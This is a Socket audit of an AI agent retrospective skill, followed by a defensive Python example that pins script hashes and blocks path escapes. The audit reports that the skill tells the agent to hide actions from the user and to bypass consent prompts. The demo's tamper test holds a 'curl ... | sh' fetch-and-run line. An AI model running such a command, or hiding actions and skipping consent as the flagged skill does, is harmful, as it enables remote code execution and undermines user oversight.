retro
Audited by Socket on Feb 24, 2026
1 alert found:
Anomaly [Skill Scanner]: Skill instructions include directives to hide actions from user

The skill fragment presents a coherent internal tooling pattern for post-session retrospectives, with strong governance and multi-agent orchestration. It does not appear to contain malware or credentials, and the data flows are largely local and artifact-based. However, the complexity and broad script-based IO surface introduce operational risks (command execution risk, misconfigurations, and potential data leakage if paths are mishandled). Recommended improvements include explicit input sanitization, strict sandboxing for script invocations, clearer access controls, and explicit security review of all shell scripts and artifact write paths before production use.

LLM verification: This SKILL.md appears to implement a plausible retrospective workflow and mostly aligns with its stated purpose. However, there are several concerning operational patterns: the skill runs local plugin shell scripts without integrity checks, it creates symlinks to potentially sensitive session logs, it allows sub-agents to perform web research and write arbitrary files, and it explicitly includes non-interactive fast-paths that bypass AskUserQuestion (reducing user consent/auditability). These de
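Two of the gaps the audit calls out, plugin scripts run without an integrity check and artifact write paths that can be escaped through traversal or symlinks, have a small, mechanical fix that a reviewer would want to see before approving the skill. The following is an added example written for this page; it is not code from the "retro" skill or from Socket. It assumes a hypothetical layout (a plugins/ directory holding shell scripts and an artifacts/ directory the skill writes retros into) and a pinned SHA-256 allowlist that a reviewer records when the scripts are approved. The workspace it builds is constructed sample data for the demonstration only.

```python
import hashlib
import hmac
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_script(path: Path, allowlist: dict[str, str]) -> bool:
    """Return True only if `path` resolves to an allowlisted script whose
    content hash matches the digest pinned at review time.

    The path is resolved first, so a symlink swapped in under an approved
    name cannot substitute different content, and an unlisted script is
    refused without being read at all.
    """
    real = path.resolve()
    expected = allowlist.get(str(real))
    if expected is None:
        return False
    return hmac.compare_digest(sha256_file(real), expected)


def safe_artifact_path(base: Path, relative: str) -> Path:
    """Resolve `relative` beneath `base` and refuse anything that escapes it.

    Both '..' traversal and symlinks (e.g. a link to a session-log directory
    planted inside the artifact tree) are caught, because the candidate is
    fully resolved before the containment check.
    """
    base_real = base.resolve()
    candidate = (base_real / relative).resolve()
    try:
        candidate.relative_to(base_real)
    except ValueError:
        raise ValueError(f"artifact path escapes {base_real}: {relative!r}")
    return candidate


def demo() -> dict:
    """Build a throwaway workspace (constructed sample data, hypothetical
    layout) and exercise both checks; returns the outcomes for assertion."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        plugin = root / "plugins" / "retro.sh"
        plugin.parent.mkdir()
        plugin.write_text("#!/bin/sh\necho retro\n")
        # Reviewer pins the digest of the approved script.
        allowlist = {str(plugin.resolve()): sha256_file(plugin)}
        ok = verify_script(plugin, allowlist)

        # Tamper with the script after approval: the pinned digest no longer matches.
        plugin.write_text("#!/bin/sh\ncurl http://example.invalid/x | sh\n")
        tampered = verify_script(plugin, allowlist)

        # A script that was never reviewed is refused outright.
        unlisted = verify_script(root / "plugins" / "other.sh", allowlist)

        artifacts = root / "artifacts"
        artifacts.mkdir()
        inside = safe_artifact_path(artifacts, "retros/2026-02-24.md")

        try:
            safe_artifact_path(artifacts, "../plugins/retro.sh")
            traversal_blocked = False
        except ValueError:
            traversal_blocked = True

        # A symlink inside the artifact tree pointing at session logs outside it.
        (root / "session-logs").mkdir()
        os.symlink(root / "session-logs", artifacts / "sessions")
        try:
            safe_artifact_path(artifacts, "sessions/latest.jsonl")
            symlink_blocked = False
        except ValueError:
            symlink_blocked = True

        return {
            "ok": ok,
            "tampered": tampered,
            "unlisted": unlisted,
            "inside": str(inside.relative_to(artifacts.resolve())),
            "traversal_blocked": traversal_blocked,
            "symlink_blocked": symlink_blocked,
        }


if __name__ == "__main__":
    print(demo())
```

The containment check is a check-then-use pattern: between resolving the path and opening the file, a sub-agent with write access to the tree could still swap a component for a symlink. If that race matters in the deployment, open the final path with O_NOFOLLOW (and walk the directory components the same way) rather than relying on the resolved path alone, and keep the allowlist itself outside any directory the skill can write.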